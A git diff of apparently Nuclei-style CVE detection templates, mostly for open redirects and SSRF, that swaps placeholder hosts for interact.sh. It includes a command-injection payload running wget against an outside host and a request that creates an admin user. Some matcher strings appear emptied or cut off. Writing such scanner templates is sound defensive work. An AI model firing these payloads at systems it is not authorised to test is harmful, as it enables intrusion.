diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml index 53060c8ed3..c4f1e581a5 100644 --- a/cves/2009/CVE-2009-5020.yaml +++ b/cves/2009/CVE-2009-5020.yaml @@ -19,13 +19,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/awstats/awredir.pl?url=example.com' - - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' + - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh' stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/02/13 diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml index bb7040e1d4..88d17c92a9 100644 --- a/cves/2013/CVE-2013-2248.yaml +++ b/cves/2013/CVE-2013-2248.yaml @@ -18,12 +18,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.action?redirect:http://www.example.com/" + - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header # Enhanced by mp on 2022/02/21 diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml index 27037cadac..a50ed20d70 100644 --- a/cves/2014/CVE-2014-9617.yaml +++ b/cves/2014/CVE-2014-9617.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/" + - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' # Enhanced by mp on 2022/02/25 diff --git a/cves/2015/CVE-2015-5354.yaml b/cves/2015/CVE-2015-5354.yaml index 9ab1da69ac..42b45db3e3 100644 --- a/cves/2015/CVE-2015-5354.yaml +++ b/cves/2015/CVE-2015-5354.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com' + - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml index 37fe790d57..70deccfb6e 100644 --- a/cves/2015/CVE-2015-5461.yaml +++ b/cves/2015/CVE-2015-5461.yaml @@ -17,10 +17,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml index 78174bdbb0..1f595d4edf 100644 --- a/cves/2015/CVE-2015-7823.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -16,10 +16,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/" + - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml index 601462cf16..31ea2c13be 100644 --- a/cves/2016/CVE-2016-3978.yaml +++ b/cves/2016/CVE-2016-3978.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.example.com' + - '{{BaseURL}}/login?redir=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 760d49e6a1..8ac82d2d67 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -42,7 +42,7 @@ requests: -c - example.com + interact.sh diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml index f8205c321b..2931b0c317 100644 --- a/cves/2017/CVE-2017-12138.yaml +++ b/cves/2017/CVE-2017-12138.yaml @@ -26,7 +26,7 @@ requests: uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login - | - GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1 + GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -34,4 +34,4 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index b0ea8cdf0b..8b9c4aefb0 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh" matchers: - type: word words: - - 'noresize src="/\example.com?configName=' + - 'noresize src="/\interact.sh?configName=' part: body # Enhanced by mp on 2022/04/14 diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index 371917e082..89b12d36fe 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}//example.com" + - "{{BaseURL}}//interact.sh" matchers: - type: regex regex: - - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" + - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh" part: header # Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml index c1d638cc99..300570d436 100644 --- a/cves/2018/CVE-2018-12300.yaml +++ b/cves/2018/CVE-2018-12300.yaml @@ -19,10 +19,10 @@ requests: - method: GET path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-12675.yaml b/cves/2018/CVE-2018-12675.yaml index 2a10a92033..b2311e0466 100644 --- a/cves/2018/CVE-2018-12675.yaml +++ b/cves/2018/CVE-2018-12675.yaml @@ -23,10 +23,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com' + - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' matchers: - type: word part: body words: - - '' + - '' diff --git a/cves/2018/CVE-2018-14474.yaml b/cves/2018/CVE-2018-14474.yaml index 3264d6fa9c..a120704c60 100644 --- a/cves/2018/CVE-2018-14474.yaml +++ b/cves/2018/CVE-2018-14474.yaml @@ -21,12 +21,12 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login?next=http://attacker.com/?app.scan/' - - '{{BaseURL}}/signup?next=http://attacker.com/?app.scan/' + - '{{BaseURL}}/login?next=http://interact.sh/?app.scan/' + - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/' stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml index 1ae3602c19..0a5fad2968 100644 --- a/cves/2018/CVE-2018-14574.yaml +++ b/cves/2018/CVE-2018-14574.yaml @@ -22,7 +22,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}//www.example.com" + - "{{BaseURL}}//www.interact.sh" matchers-condition: and matchers: @@ -31,6 +31,6 @@ requests: - 301 - type: word words: - - "Location: https://www.example.com" - - "Location: http://www.example.com" + - "Location: https://www.interact.sh" + - "Location: http://www.interact.sh" part: header diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml index babdd309c5..884a14b46c 100644 --- a/cves/2018/CVE-2018-14931.yaml +++ b/cves/2018/CVE-2018-14931.yaml @@ -19,12 +19,12 @@ requests: - method: GET path: - - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com' + - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-16761.yaml b/cves/2018/CVE-2018-16761.yaml index 147ab0b9d1..ec40ee117f 100644 --- a/cves/2018/CVE-2018-16761.yaml +++ b/cves/2018/CVE-2018-16761.yaml @@ -21,12 +21,12 @@ info: requests: - method: GET path: - - '{{BaseURL}}/select_project.php?url=http://attacker.com' - - '{{BaseURL}}/clock_status.php?current_page=http://attacker.com' + - '{{BaseURL}}/select_project.php?url=http://interact.sh' + - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh' stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index e9c70f056b..02d8bd123f 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -22,8 +22,8 @@ info: requests: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' stop-at-first-match: true matchers-condition: and @@ -32,7 +32,7 @@ requests: - type: word part: body words: - - "self.location = 'http://www.example.com'" + - "self.location = 'http://www.interact.sh'" - type: status status: diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index ce3dce57f2..b4df959f48 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml @@ -20,7 +20,7 @@ requests: path: - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' - body: + body: matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-6200.yaml b/cves/2018/CVE-2018-6200.yaml index 87bd8ef42a..3ef39cbffe 100644 --- a/cves/2018/CVE-2018-6200.yaml +++ b/cves/2018/CVE-2018-6200.yaml @@ -21,8 +21,8 @@ info: requests: - method: GET path: - - '{{BaseURL}}/redirector.php?url=https://attacker.com' - - '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com' + - '{{BaseURL}}/redirector.php?url=https://interact.sh' + - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' matchers-condition: and matchers: @@ -30,7 +30,7 @@ requests: - type: word part: body words: - - '' + - '' - type: status status: diff --git a/cves/2019/CVE-2019-1010290.yaml b/cves/2019/CVE-2019-1010290.yaml index 24fe7c97df..36da70ab7c 100644 --- a/cves/2019/CVE-2019-1010290.yaml +++ b/cves/2019/CVE-2019-1010290.yaml @@ -19,10 +19,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com' + - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index b2780cf573..52999cd8cd 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -25,10 +25,10 @@ requests: Content-Type: application/x-www-form-urlencoded body: | - success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass + success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass matchers: - type: regex part: header regex: - - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$" \ No newline at end of file + - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$" \ No newline at end of file diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index fce4ffdd64..ed12c1a447 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml @@ -25,7 +25,7 @@ requests: headers: Content-Type: application/json body: | - {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} + {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"} matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index b827b04270..48ffb51ea7 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' + - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml index 26ef262b5d..c865445f3f 100644 --- a/cves/2019/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/updating.jsp?url=https://example.com/" + - "{{BaseURL}}/updating.jsp?url=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index ea6ce7dd2f..fa1e54195e 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -21,13 +21,13 @@ requests: - method: GET path: - - '{{BaseURL}}/index.php?redirect=/\/evil.com/' - - '{{BaseURL}}/index.php?redirect=//evil.com' + - '{{BaseURL}}/index.php?redirect=/\/interact.sh/' + - '{{BaseURL}}/index.php?redirect=//interact.sh' matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' part: header # Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index 02c6e86d2e..9d9059661f 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/' + - '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/' matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' part: header # Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-13945.yaml b/cves/2020/CVE-2020-13945.yaml index 3247e37750..6c740884d6 100644 --- a/cves/2020/CVE-2020-13945.yaml +++ b/cves/2020/CVE-2020-13945.yaml @@ -30,7 +30,7 @@ requests: "upstream":{ "type":"roundrobin", "nodes":{ - "example.com:80":1 + "interact.sh:80":1 } } } diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml index ed603d9e0d..30e754c8d8 100644 --- a/cves/2020/CVE-2020-18268.yaml +++ b/cves/2020/CVE-2020-18268.yaml @@ -28,7 +28,7 @@ requests: btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - | - GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 + GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 Host: {{Hostname}} cookie-reuse: true @@ -36,4 +36,4 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index a642e28b21..2f482a573b 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -19,10 +19,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" + - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' part: header diff --git a/cves/2020/CVE-2020-23015.yaml b/cves/2020/CVE-2020-23015.yaml index 97f4de8c09..a718da52a7 100644 --- a/cves/2020/CVE-2020-23015.yaml +++ b/cves/2020/CVE-2020-23015.yaml @@ -19,10 +19,10 @@ requests: - method: GET path: - - '{{BaseURL}}/?url=http://example.com' + - '{{BaseURL}}/?url=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' \ No newline at end of file diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index b7eecbd3ea..344189257f 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -17,14 +17,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' + - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh' matchers-condition: and matchers: - type: word part: header words: - - "Location: https://example.com" + - "Location: https://interact.sh" - type: status status: diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 89376f3904..88c9505ec1 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -18,7 +18,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" + - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" matchers-condition: and matchers: - type: status diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml index 7780f22248..1d16630c70 100644 --- a/cves/2020/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -22,10 +22,10 @@ requests: - method: GET path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2021/CVE-2021-21311.yaml b/cves/2021/CVE-2021-21311.yaml index 70383a0a9d..afdd2b40ee 100644 --- a/cves/2021/CVE-2021-21311.yaml +++ b/cves/2021/CVE-2021-21311.yaml @@ -21,7 +21,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/adminer?elastic=example.com&username=" + - "{{BaseURL}}/adminer?elastic=interact.sh&username=" matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index 03a4cdb928..da5eb9ac90 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -28,7 +28,7 @@ requests: "user_login":"{{randstr}}", "password":"{{randstr}}", "user_name":"{{randstr}}", - "user_email":"{{randstr}}@example.com" + "user_email":"{{randstr}}@interact.sh" } matchers-condition: and diff --git a/cves/2021/CVE-2021-21745.yaml b/cves/2021/CVE-2021-21745.yaml index 65de258715..867df640ad 100644 --- a/cves/2021/CVE-2021-21745.yaml +++ b/cves/2021/CVE-2021-21745.yaml @@ -23,7 +23,7 @@ requests: - | GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 Host: {{Hostname}} - Referer: http://evil.com/127.0.0.1.html + Referer: http://interact.sh/127.0.0.1.html matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-22054.yaml b/cves/2021/CVE-2021-22054.yaml index a2e515f8d3..03ec978fa0 100644 --- a/cves/2021/CVE-2021-22054.yaml +++ b/cves/2021/CVE-2021-22054.yaml @@ -31,4 +31,4 @@ requests: - type: word words: - - "Example Domain" + - "

Interactsh Server

" diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index fa16b73f67..afd1efd5cb 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com" + - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh" stop-at-first-match: true redirects: true @@ -37,5 +37,5 @@ requests: - 200 - type: word words: - - "Example Domain" + - "

Interactsh Server

